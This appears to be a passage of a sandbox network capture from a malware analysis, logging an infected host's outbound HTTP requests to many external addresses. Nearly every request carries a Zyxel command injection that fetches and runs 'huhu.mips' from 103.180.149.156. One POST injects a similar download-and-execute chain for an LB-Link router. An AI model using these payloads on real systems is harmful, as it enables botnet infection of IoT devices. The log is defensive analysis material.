                                                      Feb 2, 2024 06:36:03.872283936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7208192.168.2.145030232.80.121.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872313976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7209192.168.2.1450848142.245.18.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872344971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7210192.168.2.145559040.15.70.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.873758078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7211192.168.2.1440610125.149.92.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.875947952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7212192.168.2.1460970116.221.104.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.875996113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7213192.168.2.1449338221.241.208.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.876032114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7214192.168.2.145275875.181.15.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.876071930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7215192.168.2.1446324174.82.106.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.876137972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7216192.168.2.1447028152.228.211.1508080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.981231928 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:04.186379910 CET496INHTTP/1.1 400 Bad Request
                                                      Date: Fri, 02 Feb 2024 05:36:04 GMT
                                                      Server: Apache/2.4.53 (Debian)
                                                      Content-Length: 302
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 31 37 2e 30 2e 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.53 (Debian) Server at 172.17.0.3 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7217192.168.2.145555867.196.161.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885322094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7218192.168.2.144418686.200.222.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885420084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7219192.168.2.1453934209.73.86.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885451078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7220192.168.2.145571631.201.188.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885482073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7221192.168.2.14551409.18.111.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885525942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7222192.168.2.143634245.226.197.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885551929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7223192.168.2.145682661.36.140.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885596037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7224192.168.2.1450672121.17.234.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885638952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7225192.168.2.1447832165.182.128.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885679960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7226192.168.2.144437827.96.102.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885704994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7227192.168.2.1456866113.58.163.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885745049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7228192.168.2.1456280166.31.54.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885782957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7229192.168.2.1447424195.112.235.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885807991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7230192.168.2.1435064184.116.237.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885873079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7231192.168.2.1438466145.126.45.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885899067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7232192.168.2.1460468210.18.32.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885922909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7233192.168.2.1450054155.90.68.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.885974884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7234192.168.2.145162485.135.50.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886023045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7235192.168.2.1446268109.246.154.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886049032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7236192.168.2.1460498184.36.76.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886104107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7237192.168.2.1441692223.183.134.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886147022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7238192.168.2.1459654203.219.83.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886183977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7239192.168.2.145101238.82.203.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886214972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7240192.168.2.1456494187.70.52.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886267900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7241192.168.2.1445660128.201.169.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886313915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7242192.168.2.1433734182.0.208.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886370897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7243192.168.2.1437640151.25.201.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886415005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7244192.168.2.146093823.48.9.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886459112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7245192.168.2.1446166140.179.172.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886485100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7246192.168.2.1452036202.137.202.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886518002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7247192.168.2.145482280.45.150.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886580944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7248192.168.2.14347029.101.8.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886605024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7249192.168.2.1460202109.235.200.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886637926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7250192.168.2.144870236.64.47.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886663914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7251192.168.2.144336423.143.1.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886719942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7252192.168.2.1442788119.136.26.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886756897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7253192.168.2.1435046163.249.55.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886790037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7254192.168.2.144932893.159.18.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886823893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7255192.168.2.1442776114.134.68.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886862993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7256192.168.2.1451950193.211.248.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886907101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7257192.168.2.145934245.34.34.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886923075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7258192.168.2.145634449.195.2.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.886964083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7259192.168.2.1455416161.92.165.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887012959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7260192.168.2.1446956161.161.105.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887053967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7261192.168.2.1450812183.130.65.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887104034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7262192.168.2.145811672.112.51.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887136936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7263192.168.2.1439008221.3.142.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887176991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7264192.168.2.1442084143.32.100.17443
                                                      TimestampBytes transferredDirectionData
